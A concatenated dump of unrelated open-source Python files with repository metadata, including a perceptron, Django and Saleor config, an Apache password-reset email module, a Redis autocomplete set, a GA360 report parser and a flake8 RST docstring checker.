labels : List of integers of [-1,1]
'''
return np.apply_along_axis(lambda x : 1 if np.dot(self.w, x) > 0 else -1, 1, features)
def get_weights(self) -> List[float]:
return self.w
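# Hedged usage sketch (not part of the original assignment file): train the perceptron on a
# tiny linearly separable toy set. The leading 1.0 in each feature vector is the bias term,
# matching the docstrings above.
if __name__ == '__main__':
    rng = np.random.RandomState(0)
    pos = rng.randn(20, 2) + 2.0
    neg = rng.randn(20, 2) - 2.0
    features = [[1.0, a, b] for a, b in np.vstack([pos, neg])]
    labels = [1] * 20 + [-1] * 20
    model = Perceptron(nb_features=2, max_iteration=100)
    print('converged:', model.train(features, labels))
    print('predictions:', model.predict(features))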
| 3.71875
| 4
|
onmydesk/forms/__init__.py
|
myollie/django-onmydesk
| 0
|
12777726
|
from . import fields
__all__ = ('fields',)
| 1.085938
| 1
|
saleor/plugins/sendgrid/__init__.py
|
greentornado/saleor
| 3
|
12777727
|
<gh_stars>1-10
from dataclasses import dataclass
from typing import Optional
@dataclass
class SendgridConfiguration:
api_key: Optional[str]
sender_name: Optional[str]
sender_address: Optional[str]
account_confirmation_template_id: Optional[str]
account_set_customer_password_template_id: Optional[str]
account_delete_template_id: Optional[str]
account_change_email_confirm_template_id: Optional[str]
account_change_email_request_template_id: Optional[str]
account_password_reset_template_id: Optional[str]
invoice_ready_template_id: Optional[str]
order_confirmation_template_id: Optional[str]
order_confirmed_template_id: Optional[str]
order_fulfillment_confirmation_template_id: Optional[str]
order_fulfillment_update_template_id: Optional[str]
order_payment_confirmation_template_id: Optional[str]
order_canceled_template_id: Optional[str]
order_refund_confirmation_template_id: Optional[str]
| 1.929688
| 2
|
modules/selfserve/files/selfserve/lib/selfserve/email.py
|
mshuler/infrastructure-puppet
| 1
|
12777728
|
<reponame>mshuler/infrastructure-puppet
#!/usr/bin/python
#
# Library logic for selfserve ss2: email.
#
# ====================================================================
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
######################################################################
import logging
import os
import re
import smtplib
import socket
import time
import StringIO
import ezt
from ss2config import *
import selfserve.keys
import selfserve.ldap
import selfserve.tokens
import selfserve.util
logger = logging.getLogger("%s.lib.email" % LOGGER_NAME)
def _hostname():
return socket.gethostbyaddr(socket.gethostname())[0]
def _make_msgid():
return "%s.%s@%s" % \
(time.strftime('%Y%m%d%H%M%S'), selfserve.util.get_hexed_random_bytes(6), _hostname())
def _maybe_encrypt_rfc822(rfc822text, fingerprints, keys):
rfc822lines = rfc822text.splitlines(True)
endofheaders = rfc822lines.index("\n")
headers = "".join(rfc822lines[:endofheaders])
body = "".join(rfc822lines[endofheaders+1:])
body, crypted = selfserve.keys.maybe_encrypt(body, fingerprints, keys)
return (headers + "\n" + body, crypted)
# TODO(bluesky): layering violation of LOOKUP
def send_email(availid, template_dir, remote24, base_url):
logger.info('emailing availid=%s remote24=%s', availid, remote24)
infos = selfserve.ldap.validate_existence(availid, True)
keys = selfserve.keys.fetch_key(availid)
if selfserve.ldap.unprivileged_p(availid):
hextoken, expiry = selfserve.tokens.make_token(PW_RESET_MAGIC, availid, cookie=remote24)
else:
# root@ cannot reset their passwords. (Use ../maint/changepw.py instead.)
# Proceed normally, but without actually creating a token.
hextoken, expiry = (selfserve.util.get_hexed_random_bytes(TOKEN_LENGTH), int(time.time()) - 86400)
logger.warning("fabricating token=%s expiry=%d for privileged availid=%s",
hextoken, expiry, availid)
msgid = _make_msgid()
    to = '<EMAIL>' % availid
tdata = {
'availid' : availid,
'remote24' : remote24,
'base_url' : base_url,
'to' : to,
'fullname' : infos['fullname'],
'fromAddress': FROM_ADDRESS,
'SERVER_ADMIN' : FROM_ADDRESS,
'token' : hextoken,
'deadline' : time.strftime(TIME_FMT, time.gmtime(expiry)),
'message_id' : msgid,
}
template = ezt.Template(os.path.join(template_dir, 'resetpassword.email'),
compress_whitespace=False)
buffer = StringIO.StringIO()
template.generate(buffer, tdata)
rfc822text = buffer.getvalue()
rfc822text, crypted = _maybe_encrypt_rfc822(rfc822text, infos['fingerprints'], keys)
# TODO: Update fail2ban if you change this message!
logger.warning("emailing password reset token to availid=%s message-id=<%s> remote24=%s encrypted=%s",
availid, msgid, remote24, str(crypted))
smtp = smtplib.SMTP(SMTP_HOST)
if SMTP_USER:
smtp.login(SMTP_USER, SMTP_PASSWORD)
smtp.sendmail(FROM_ADDRESS, to, rfc822text)
smtp.quit()
return msgid
if __name__ == '__main__':
import sys
raise Exception("Wrong invocation for %s as __main__" % sys.argv[0])
| 1.84375
| 2
|
exercise00/start.py
|
tschibu/hslu-ipcv-exercises
| 1
|
12777729
|
# -*- coding: utf-8 -*-
#!/usr/bin/python3
"""
"""
# =============================================================================
# Imports
# =============================================================================
import cv2
import numpy as np
import matplotlib as mpl
from matplotlib import pyplot as plt
# Matplot-Params
# Change size from Plots
plt.rcParams['font.size'] = 6
plt.rcParams['figure.dpi']= 100
plt.rcParams['lines.linewidth']= 1
# read img file
image = cv2.imread("data/lena_std.tiff")
# plot image
plt.imshow(image)
plt.show()
image_rgb = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
plt.imshow(image_rgb)
plt.show()
print(image_rgb[0, 0]) # RGB value at pixel (0,0)
print(image_rgb[0, 0, 0]) # Red value (same pixel)
# y=250:280, x=250:360
image_rgb[250:280, 250:360] = [255, 255, 255]
plt.imshow(image_rgb)
plt.show()
#
image_bw = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
image_gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
# bw
plt.subplot(1, 2, 1)
plt.imshow(image_bw)
plt.subplot(1, 2, 2)
plt.imshow(image_rgb)
# gray
plt.subplot(1, 2, 1)
plt.imshow(image_gray, 'gray')
plt.subplot(1, 2, 2)
plt.imshow(image_rgb)
| 3.15625
| 3
|
kProcessor/kmerRow.py
|
drtamermansour/Kprocessor
| 8
|
12777730
|
class kmerRow():
kmer = str()
hashedKmer = int()
count = int()
def __init__(self, kmer, hashedKmer, count):
"""
kmerRow class constructor.
:param kmer: The kmer string
:type kmer: str
        :param hashedKmer: The hashed value of the kmer
        :type hashedKmer: int
        :param count: The kmer count
        :type count: int
:return: kmerRow object with the predefined data.
:rtype: :class:`kProcessor.kmerRow`
"""
pass
| 3
| 3
|
base64N.py
|
thebuster0/Base64-n
| 1
|
12777731
|
<reponame>thebuster0/Base64-n
#cython: language_level=3
import stdbase64 as base64
def Encrypt(byte, loopTime, debug = False):
result = byte
if debug:
for time in range(1, loopTime + 1):
result = base64.b64encode(result)
print("Current loop time:", time)
else:
for time in range(1, loopTime + 1):
result = base64.b64encode(result)
return result
def Decrypt(byte, loopTime, debug = False):
result = byte
if debug:
for time in range(1, loopTime + 1):
result = base64.b64decode(result, validate = True)
print("Current loop time:", time)
else:
for time in range(1, loopTime + 1):
result = base64.b64decode(result, validate = True)
return result
def TryDecrypt(byte, decryptLastTime = False, debug = False):
result = byte
try:
if debug:
loopTimes = 0
while True:
result = base64.b64decode(result, validate = True)
loopTimes += 1
print("Current loop time:", loopTimes)
print(result)
else:
while True:
result = base64.b64decode(result, validate = True)
except:
if not decryptLastTime:
result = base64.b64encode(result)
return result
def EncryptToFile(byte, loopTime, path, debug = False):
file = open(path, "wb")
file.write(Encrypt(byte, loopTime, debug))
file.close()
def DecryptToFile(byte, loopTime, path, debug = False):
file = open(path, "wb")
file.write(Decrypt(byte, loopTime, debug))
file.close()
def DecryptFromFile(fileObj, loopTime, debug = False):
return Decrypt(fileObj.read(), loopTime, debug)
def EncryptFromFile(fileObj, loopTime, debug = False):
return Encrypt(fileObj.read(), loopTime, debug)
| 2.875
| 3
|
2021/day14/day14.py
|
grecine/advent-of-code
| 0
|
12777732
|
import numpy as np
import os
import time
np.set_printoptions(threshold=np.inf)
def input(fname):
day_dir = os.path.realpath(__file__).split('/')[:-1]
fname = os.path.join('/',*day_dir, fname)
data = []
with open(fname) as f:
for line in f:
data.append(line.strip())
return data
def count_ele(pairs):
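    # Added note: each interior element of the polymer sits in exactly two adjacent pairs,
    # so every pair contributes half a count per element; the template's first and last
    # characters belong to only one pair each, so their missing halves are added back below.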
elem_count = {e: 0 for e in rules.values()}
for pair in pairs:
elem_count[pair[0][0]] += 0.5*pair[1]
elem_count[pair[0][1]] += 0.5*pair[1]
elem_count[seed[0]] += 0.5
elem_count[seed[-1]] += 0.5
return elem_count
def do_steps(pairs, rules, n):
for i in range(n):
new_pairs = []
for pair in pairs:
insertion = rules[pair[0]]
new_pairs.extend([(pair[0][0]+insertion, pair[1]), (insertion+pair[0][1], pair[1])])
counts = {p: 0 for p in set(np.array(new_pairs)[:,0])}
        for new_pair in new_pairs:
            counts[new_pair[0]] += new_pair[1]
pairs = [(p, counts[p]) for p in counts]
elem_count = count_ele(pairs)
min_ele = min(elem_count, key=elem_count.get)
max_ele = max(elem_count, key=elem_count.get)
print(int(elem_count[max_ele] - elem_count[min_ele]))
rules = input('input.txt')
# rules = input('test-input.txt')
seed = rules[0]
rules = {d.split(' ')[0]: d.split(' ')[2] for d in rules[2:]}
unique_pairs = set([seed[i]+seed[i+1] for i in range(len(seed)-1)])
pairs = [(p, list(unique_pairs).count(p)) for p in unique_pairs]
# part 1
t0 = time.time()
print('Part 1:')
do_steps(pairs, rules, 10)
print('Elapsed time:',time.time()-t0,' sec')
# part 2
t0 = time.time()
print('\nPart 2:')
do_steps(pairs, rules, 40)
print('Elapsed time:',time.time()-t0,' sec')
| 2.625
| 3
|
PythonExercices/Semana_Python_Ocean_Marco_2021-main/Exercicios_Python_PauloSalvatore/Exercicio_8.py
|
Rkhwong/RHK_PYTHON_LEARNING
| 0
|
12777733
|
"""
Exercício 8
Nome: Comparação de Números: Maior, Menor ou Igual
Objetivo: Receber dois números e exibir qual é maior, menor ou igual a quem.
Dificuldade: Principiante
1 - Escreva um programa que receba dois números, {numero1} e {numero2}:
2 - Caso o {numero1} seja maior do que o {numero2}, exiba na tela: "O número {numero1} é maior do que o número {numero2}.";
3 - Caso contrário, se o {numero1} for menor, exiba: "O número {numero1} é menor que {numero2}.";
4 - Caso contrário, exiba: "O número {numero1} é igual ao número {numero2}.".
"""
# Resolução
def compararNum(x,y):
if x > y:
print("{} Maior que {}".format(x,y))
elif x < y:
print("{} Menor que {}".format(x,y))
else:
print("{} Igual que {}".format(x,y))
x = int(input("Valor A:"))
y = int(input("Valor B:"))
compararNum(x,y)
| 4.40625
| 4
|
nydkcd11/blog/migrations/0019_auto_20170712_2245.py
|
asi14/nydkc11
| 0
|
12777734
|
<gh_stars>0
# -*- coding: utf-8 -*-
# Generated by Django 1.11.2 on 2017-07-12 22:45
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('blog', '0018_image_show_home'),
]
operations = [
migrations.AddField(
model_name='link',
name='other_link',
field=models.ManyToManyField(blank=True, related_name='links', to='blog.Post', verbose_name=b'Other Related Posts'),
),
migrations.AlterField(
model_name='link',
name='link',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='blog.Post', verbose_name=b'Primary Post'),
),
]
| 1.59375
| 2
|
gpflow/utilities/utilities.py
|
HarrySpearing/GPflow
| 1,724
|
12777735
|
# Copyright 2017-2021 The GPflow Contributors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
This module is deprecated, and is only provided for backwards compatibility.
It will be removed in GPflow 2.3.
"""
from deprecated import deprecated
from . import misc, traversal
__all__ = []
def _create_module_redirects(m):
for name in m.__all__:
func = getattr(m, name)
assert callable(func), "all names exported by misc and traversal should be functions"
deprecated_func = deprecated(
reason="The gpflow.utilities.utilities module is deprecated and will "
f"be removed in GPflow 2.3; use gpflow.utilities.{name} instead."
)(func)
globals()[name] = deprecated_func
__all__.append(name)
_create_module_redirects(misc)
_create_module_redirects(traversal)
del _create_module_redirects, misc, traversal
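# Usage note (illustrative, assuming `print_summary` is among the names exported
# by the misc/traversal modules): importing a redirected name still works,
#
#   from gpflow.utilities.utilities import print_summary   # emits DeprecationWarning
#
# but the warning points the caller at `gpflow.utilities.print_summary` instead.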
| 1.65625
| 2
|
app/utils/redisset.py
|
Maxcutex/pm_api
| 0
|
12777736
|
<reponame>Maxcutex/pm_api
"""RedisSet class for PM."""
from redis import Redis
from config import get_env
END_DELIMITER = "%"
class RedisSet(object):
"""
Implements a simple sorted set with Redis
"""
def __init__(self, name="redis", namespace="pm", url=None):
"""
The default connection parameters are:
host = 'localhost', port = 6379, db = 0
"""
url = url or get_env("REDIS_URL")
self.__db = Redis.from_url(url, charset="utf-8", decode_responses=True)
self.key = f"{namespace}:{name}"
def push(self, item, ending=False):
"""Push item onto the sorted set."""
if ending:
item = f"{item}{END_DELIMITER}"
self.__db.zadd(self.key, {item: 0})
def get(self, prefix, count=50):
"""Get items from the sorted set that match prefix."""
values = []
rangelen = 50
start = self.__db.zrank(self.key, prefix)
if start is None:
return []
while len(values) != count:
ranges = self.__db.zrange(self.key, start, start + rangelen - 1)
start += rangelen
            if not ranges:  # empty result ends the scan
break
for entry in ranges:
minlen = min(len(entry), len(prefix))
if entry[0:minlen] != prefix[0:minlen]:
count = len(values)
break
if entry[-1] == END_DELIMITER and len(values) != count:
values.append(entry[0:-1])
return values
def zrange(self, start, stop):
return self.__db.zrange(self.key, start, stop)
def _delete(self):
self.__db.zremrangebyrank(self.key, 0, -1)
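# Usage sketch (illustrative; assumes a Redis server reachable via REDIS_URL or
# the url= argument).  get() walks the sorted set from the rank of the prefix,
# so every prefix of a word is pushed as a plain entry and the complete word is
# pushed with ending=True, so that only finished words (marked with '%') are
# returned:
#
#   names = RedisSet(name="autocomplete")
#   for word in ("paul", "paula", "pauline"):
#       for i in range(1, len(word)):
#           names.push(word[:i])        # navigation entries
#       names.push(word, ending=True)   # the completed word
#   names.get("pau")                    # -> ['paul', 'paula', 'pauline']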
| 2.90625
| 3
|
application/classes/ga360_report_response.py
|
isabella232/report2bq
| 9
|
12777737
|
<reponame>isabella232/report2bq
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import annotations
import csv
import dataclasses
import io
import dataclasses_json
from classes.ga360_report import GA360MetricType
from typing import Any, Dict, List, Optional
@dataclasses_json.dataclass_json(letter_case=dataclasses_json.LetterCase.CAMEL)
@dataclasses.dataclass
class GA360ReportResponse(object):
column_header: GA360ReportResponse.ColumnHeader
data: GA360ReportResponse.ReportData
def to_csv(self, output: io.StringIO) -> None:
# Fetch the field names from the column_header
fieldnames = self.column_header.fieldnames
# Create csv.DictWriter using this and a buffer
writer = \
csv.DictWriter(output, fieldnames=fieldnames, quoting=csv.QUOTE_ALL)
writer.writeheader()
    # Write each data row through the csv.DictWriter
for row_data in self.data.rows:
result_row = dict(zip(fieldnames, row_data.row))
writer.writerow(result_row)
@dataclasses_json.dataclass_json(letter_case=dataclasses_json.LetterCase.CAMEL)
@dataclasses.dataclass
class ColumnHeader(object):
dimensions: List[str]
metric_header: GA360ReportResponse.MetricHeader
@property
def fieldnames(self) -> List[str]:
metric_names = \
[ header.name for header in self.metric_header.metric_header_entries ]
fieldnames = [ *self.dimensions.copy(), *metric_names ]
return fieldnames
@dataclasses_json.dataclass_json(letter_case=dataclasses_json.LetterCase.CAMEL)
@dataclasses.dataclass
class MetricHeaderEntry(object):
name: str
type: GA360MetricType
@dataclasses_json.dataclass_json(letter_case=dataclasses_json.LetterCase.CAMEL)
@dataclasses.dataclass
class MetricHeader(object):
metric_header_entries: List[GA360ReportResponse.MetricHeaderEntry]
pivot_headers: Optional[List[Any]] = None
@dataclasses_json.dataclass_json(letter_case=dataclasses_json.LetterCase.CAMEL)
@dataclasses.dataclass
class ReportData(object):
rows: List[GA360ReportResponse.ReportRow]
totals: List[GA360ReportResponse.DateRangeValues]
row_count: int
minimums: List[GA360ReportResponse.DateRangeValues]
maximums: List[GA360ReportResponse.DateRangeValues]
samples_read_counts: List[str]
sampling_space_sizes: List[str]
is_data_golden: Optional[bool] = None
data_last_refreshed: Optional[str] = None
@dataclasses_json.dataclass_json(letter_case=dataclasses_json.LetterCase.CAMEL)
@dataclasses.dataclass
class ReportRow(object):
dimensions: List[str]
metrics: List[GA360ReportResponse.DateRangeValues]
@property
def row(self) -> List[str]:
row = [ *self.dimensions, *self.metrics[0].values ]
return row
@dataclasses_json.dataclass_json(letter_case=dataclasses_json.LetterCase.CAMEL)
@dataclasses.dataclass
class DateRangeValues(object):
values: List[str]
pivot_value_regions: Optional[List[GA360ReportResponse.PivotValueRegion]] = None
@dataclasses_json.dataclass_json(letter_case=dataclasses_json.LetterCase.CAMEL)
@dataclasses.dataclass
class PivotValueRegion(object):
values: List[str]
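# Usage sketch (illustrative): the dataclasses_json decorators add from_dict /
# from_json class methods, so a single camelCase report dict from the GA360
# `reports[]` array (here called `api_reply`, an assumed variable) can be parsed
# and flattened to CSV:
#
#   report = GA360ReportResponse.from_dict(api_reply)
#   buffer = io.StringIO()
#   report.to_csv(buffer)
#   print(buffer.getvalue())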
| 2.625
| 3
|
venv/lib/python3.8/site-packages/flake8_rst_docstrings.py
|
trkohler/biopython
| 0
|
12777738
|
"""Check Python docstrings validate as reStructuredText (RST).
This is a plugin for the flake8 tool for checking Python
source code.
"""
import logging
import re
import sys
import textwrap
import tokenize as tk
from itertools import chain, dropwhile
try:
from StringIO import StringIO
except ImportError: # Python 3.0 and later
from io import StringIO
from io import TextIOWrapper
#####################################
# Start of backported tokenize code #
#####################################
# If possible (python >= 3.2) use tokenize.open to open files, so PEP 263
# encoding markers are interpreted.
try:
tokenize_open = tk.open
except AttributeError:
# Fall back on a backport of the encoding aware tokenize open function,
# which requires we back port tokenize.detect_encoding to implement.
from codecs import lookup, BOM_UTF8
from io import open as io_open
cookie_re = re.compile(r"^[ \t\f]*#.*?coding[:=][ \t]*([-\w.]+)")
blank_re = re.compile(br"^[ \t\f]*(?:[#\r\n]|$)")
    # The name 'blank regular expression' is slightly misleading: it matches
    # lines that are blank once any Python # comment is removed.
    # The key test cases of interest are hashbang lines!
assert blank_re.match(b"\n")
assert blank_re.match(b"# Comment\n")
assert blank_re.match(b"#!/usr/bin/python\n")
assert blank_re.match(b"#!/usr/bin/env python\n")
assert not blank_re.match(b'"""Welcome\n')
assert not blank_re.match(b'"""Welcome"""\n')
def _get_normal_name(orig_enc):
"""Imitates get_normal_name in tokenizer.c (PRIVATE)."""
# sys.stderr.write("DEBUG: _get_normal_name(%r)\n" % orig_enc)
# Only care about the first 12 characters.
enc = orig_enc[:12].lower().replace("_", "-")
if enc == "utf-8" or enc.startswith("utf-8-"):
return "utf-8"
if enc in ("latin-1", "iso-8859-1", "iso-latin-1") or enc.startswith(
("latin-1-", "iso-8859-1-", "iso-latin-1-")
):
return "iso-8859-1"
return orig_enc
def _find_cookie(line, filename, bom_found):
"""Find encoding string in a line of Python (PRIVATE)."""
# sys.stderr.write("DEBUG: _find_cookie(%r, %r, %r)\n"
# % (line, filename, bom_found))
match = cookie_re.match(line)
if not match:
return None
encoding = _get_normal_name(match.group(1))
try:
lookup(encoding)
except LookupError:
# This behaviour mimics the Python interpreter
raise SyntaxError(
"unknown encoding for {!r}: {}".format(filename, encoding)
)
if bom_found:
if encoding != "utf-8":
# This behaviour mimics the Python interpreter
raise SyntaxError("encoding problem for {!r}: utf-8".format(filename))
encoding += "-sig"
return encoding
def tokenize_open(filename):
"""Simulate opening a Python file read only with the correct encoding.
While this was based on the Python 3 standard library function
tokenize.open in order to backport it to Python 2.7, this proved
painful.
        Note that because this text will later be fed into ``exec(...)`` we
        would otherwise hit "SyntaxError: encoding declaration in Unicode
        string", so the handle returned has the encoding line masked out!
Note we don't just remove the line as that would throw off the line
numbers, it is replaced with a Python comment.
"""
# sys.stderr.write("DEBUG: tokenize_open(%r)\n" % filename)
# Will check the first & second lines for an encoding
# AND REMOVE IT FROM THE TEXT RETURNED
with io_open(filename, "rb") as handle:
lines = list(handle)
# Find the encoding
first = lines[0] if lines else b""
second = lines[1] if len(lines) > 1 else b""
default = "utf-8"
bom_found = False
if first.startswith(BOM_UTF8):
bom_found = True
first = first[3:]
default = "utf-8-sig"
encoding = _find_cookie(first, filename, bom_found)
if encoding:
lines[0] = "# original encoding removed\n"
if not encoding and blank_re.match(first):
# sys.stderr.write("DEBUG: Trying second line %r\n"
# % second)
encoding = _find_cookie(second, filename, bom_found)
if encoding:
lines[1] = "# original encoding removed\n"
if not encoding:
encoding = default
# sys.stderr.write("DEBUG: tokenize_open using encoding=%r\n"
# % encoding)
# Apply the encoding, using StringIO as we removed the
# original encoding to help legacy code using exec.
# for b in lines:
# sys.stderr.write(b"DEBUG: " + b)
return StringIO("".join(b.decode(encoding) for b in lines))
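    # Behaviour sketch (illustrative): for a source file whose first line is
    #   # -*- coding: latin-1 -*-
    # the handle returned by tokenize_open() starts with the replacement line
    #   # original encoding removed
    # and the remaining lines are decoded as iso-8859-1.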
###################################
# End of backported tokenize code #
###################################
import restructuredtext_lint as rst_lint
__version__ = "0.0.13"
log = logging.getLogger(__name__)
rst_prefix = "RST"
rst_fail_load = 900
rst_fail_parse = 901
rst_fail_all = 902
rst_fail_lint = 903
# Level 1 - info
code_mapping_info = {
"Possible title underline, too short for the title.": 1,
"Unexpected possible title overline or transition.": 2,
}
# Level 2 - warning
code_mapping_warning = {
# XXX ends without a blank line; unexpected unindent:
"Block quote ends without a blank line; unexpected unindent.": 1,
"Bullet list ends without a blank line; unexpected unindent.": 2,
"Definition list ends without a blank line; unexpected unindent.": 3,
"Enumerated list ends without a blank line; unexpected unindent.": 4,
"Explicit markup ends without a blank line; unexpected unindent.": 5,
"Field list ends without a blank line; unexpected unindent.": 6,
"Literal block ends without a blank line; unexpected unindent.": 7,
"Option list ends without a blank line; unexpected unindent.": 8,
# Other:
"Inline strong start-string without end-string.": 10,
"Blank line required after table.": 11,
"Title underline too short.": 12,
"Inline emphasis start-string without end-string.": 13,
"Inline literal start-string without end-string.": 14,
"Inline interpreted text or phrase reference start-string without end-string.": 15,
"Multiple roles in interpreted text (both prefix and suffix present; only one allowed).": 16, # noqa: E501
"Mismatch: both interpreted text role suffix and reference suffix.": 17,
"Literal block expected; none found.": 18,
"Inline substitution_reference start-string without end-string.": 19,
}
# Level 3 - error
code_mapping_error = {
"Unexpected indentation.": 1,
"Malformed table.": 2,
# e.g. Unknown directive type "req".
"Unknown directive type": 3,
# e.g. Unknown interpreted text role "need".
"Unknown interpreted text role": 4,
# e.g. Undefined substitution referenced: "dict".
"Undefined substitution referenced:": 5,
# e.g. Unknown target name: "license_txt".
"Unknown target name:": 6,
}
# Level 4 - severe
code_mapping_severe = {"Unexpected section title.": 1}
code_mappings_by_level = {
1: code_mapping_info,
2: code_mapping_warning,
3: code_mapping_error,
4: code_mapping_severe,
}
def code_mapping(level, msg, extra_directives, extra_roles, default=99):
"""Return an error code between 0 and 99."""
try:
return code_mappings_by_level[level][msg]
except KeyError:
pass
# Following assumes any variable messages take the format
# of 'Fixed text "variable text".' only:
# e.g. 'Unknown directive type "req".'
# ---> 'Unknown directive type'
# e.g. 'Unknown interpreted text role "need".'
# ---> 'Unknown interpreted text role'
if msg.count('"') == 2 and ' "' in msg and msg.endswith('".'):
txt = msg[: msg.index(' "')]
value = msg.split('"', 2)[1]
if txt == "Unknown directive type" and value in extra_directives:
return 0
if txt == "Unknown interpreted text role" and value in extra_roles:
return 0
return code_mappings_by_level[level].get(txt, default)
return default
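# Worked example (illustrative): a docutils message with level=3 and text
# 'Unknown directive type "req".' has no exact entry in the level-3 table, so
# the text before the quoted value ('Unknown directive type') is looked up
# instead, yielding 3; the caller later reports it as RST303 (100*level + code).
# If "req" had been listed via --rst-directives, 0 would be returned and the
# message ignored.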
####################################
# Start of code copied from PEP257 #
####################################
# This is the reference implementation of the algorithm
# in PEP257 for removing the indentation of a docstring,
# which has been placed in the public domain.
#
# This includes the minor change from sys.maxint to
# sys.maxsize for Python 3 compatibility.
#
# https://www.python.org/dev/peps/pep-0257/#handling-docstring-indentation
def trim(docstring):
"""PEP257 docstring indentation trim function."""
if not docstring:
return ""
# Convert tabs to spaces (following the normal Python rules)
# and split into a list of lines:
lines = docstring.expandtabs().splitlines()
# Determine minimum indentation (first line doesn't count):
indent = sys.maxsize
for line in lines[1:]:
stripped = line.lstrip()
if stripped:
indent = min(indent, len(line) - len(stripped))
# Remove indentation (first line is special):
trimmed = [lines[0].strip()]
if indent < sys.maxsize:
for line in lines[1:]:
trimmed.append(line[indent:].rstrip())
# Strip off trailing and leading blank lines:
while trimmed and not trimmed[-1]:
trimmed.pop()
while trimmed and not trimmed[0]:
trimmed.pop(0)
# Return a single string:
return "\n".join(trimmed)
##################################
# End of code copied from PEP257 #
##################################
def dequote_docstring(text):
"""Remove the quotes delimiting a docstring."""
# TODO: Process escaped characters unless raw mode?
text = text.strip()
if len(text) > 6 and text[:3] == text[-3:] == '"""':
# Standard case, """..."""
return text[3:-3]
if len(text) > 7 and text[:4] in ('u"""', 'r"""') and text[-3:] == '"""':
# Unicode, u"""...""", or raw r"""..."""
return text[4:-3]
# Other flake8 tools will report atypical quotes:
if len(text) > 6 and text[:3] == text[-3:] == "'''":
return text[3:-3]
if len(text) > 7 and text[:4] in ("u'''", "r'''") and text[-3:] == "'''":
return text[4:-3]
if len(text) > 2 and text[0] == text[-1] == '"':
return text[1:-1]
if len(text) > 3 and text[:2] in ('u"', 'r"') and text[-1] == '"':
return text[2:-1]
if len(text) > 2 and text[0] == text[-1] == "'":
return text[1:-1]
if len(text) > 3 and text[:2] in ("u'", "r'") and text[-1] == "'":
return text[2:-1]
raise ValueError("Bad quotes!")
##################################################
# Start of code copied from pydocstyle/parser.py #
##################################################
def humanize(string):
"""Make a string human readable."""
return re.compile(r"(.)([A-Z]+)").sub(r"\1 \2", string).lower()
class Value(object):
"""A generic object with a list of preset fields."""
def __init__(self, *args):
"""Initialize."""
if len(self._fields) != len(args):
raise ValueError(
"got {} arguments for {} fields for {}: {}".format(
len(args), len(self._fields), self.__class__.__name__, self._fields
)
)
vars(self).update(zip(self._fields, args))
def __hash__(self):
"""Hash."""
return hash(repr(self))
def __eq__(self, other):
"""Equality."""
return other and vars(self) == vars(other)
def __repr__(self):
"""Representation."""
kwargs = ", ".join(
"{}={!r}".format(field, getattr(self, field)) for field in self._fields
)
return "{}({})".format(self.__class__.__name__, kwargs)
class Definition(Value):
"""A Python source code definition (could be class, function, etc)."""
_fields = (
"name",
"_source",
"start",
"end",
"decorators",
"docstring",
"children",
"parent",
"skipped_error_codes",
)
_human = property(lambda self: humanize(type(self).__name__))
kind = property(lambda self: self._human.split()[-1])
module = property(lambda self: self.parent.module)
all = property(lambda self: self.module.all)
_slice = property(lambda self: slice(self.start - 1, self.end))
is_class = False
def __iter__(self):
"""Iterate."""
return chain([self], *self.children)
@property
def _publicity(self):
return {True: "public", False: "private"}[self.is_public]
@property
def source(self):
"""Return the source code for the definition."""
full_src = self._source[self._slice]
def is_empty_or_comment(line):
return line.strip() == "" or line.strip().startswith("#")
filtered_src = dropwhile(is_empty_or_comment, reversed(full_src))
return "".join(reversed(list(filtered_src)))
def __str__(self):
"""Definition as a string."""
out = "in {} {} `{}`".format(self._publicity, self._human, self.name)
if self.skipped_error_codes:
out += " (skipping {})".format(self.skipped_error_codes)
return out
class Module(Definition):
"""A Python source code module."""
_fields = (
"name",
"_source",
"start",
"end",
"decorators",
"docstring",
"children",
"parent",
"_all",
"future_imports",
"skipped_error_codes",
)
_nest = staticmethod(lambda s: {"def": Function, "class": Class}[s])
module = property(lambda self: self)
all = property(lambda self: self._all)
@property
def is_public(self):
"""Is the module public."""
return not self.name.startswith("_") or self.name.startswith("__")
def __str__(self):
"""Definition as a string."""
return "at module level"
class Package(Module):
"""A package is a __init__.py module."""
class Function(Definition):
"""A Python source code function."""
_nest = staticmethod(lambda s: {"def": NestedFunction, "class": NestedClass}[s])
@property
def is_public(self):
"""Return True iff this function should be considered public."""
if self.all is not None:
return self.name in self.all
else:
return not self.name.startswith("_")
@property
def is_test(self):
"""Return True if this function is a test function/method.
We exclude tests from the imperative mood check, because to phrase
their docstring in the imperative mood, they would have to start with
a highly redundant "Test that ...".
"""
return self.name.startswith("test") or self.name == "runTest"
class NestedFunction(Function):
"""A Python source code nested function."""
is_public = False
class Method(Function):
"""A Python source code method."""
@property
def is_magic(self):
"""Return True iff this method is a magic method (e.g., `__str__`)."""
return (
self.name.startswith("__")
and self.name.endswith("__")
and self.name not in VARIADIC_MAGIC_METHODS
)
@property
def is_public(self):
"""Return True iff this method should be considered public."""
# Check if we are a setter/deleter method, and mark as private if so.
for decorator in self.decorators:
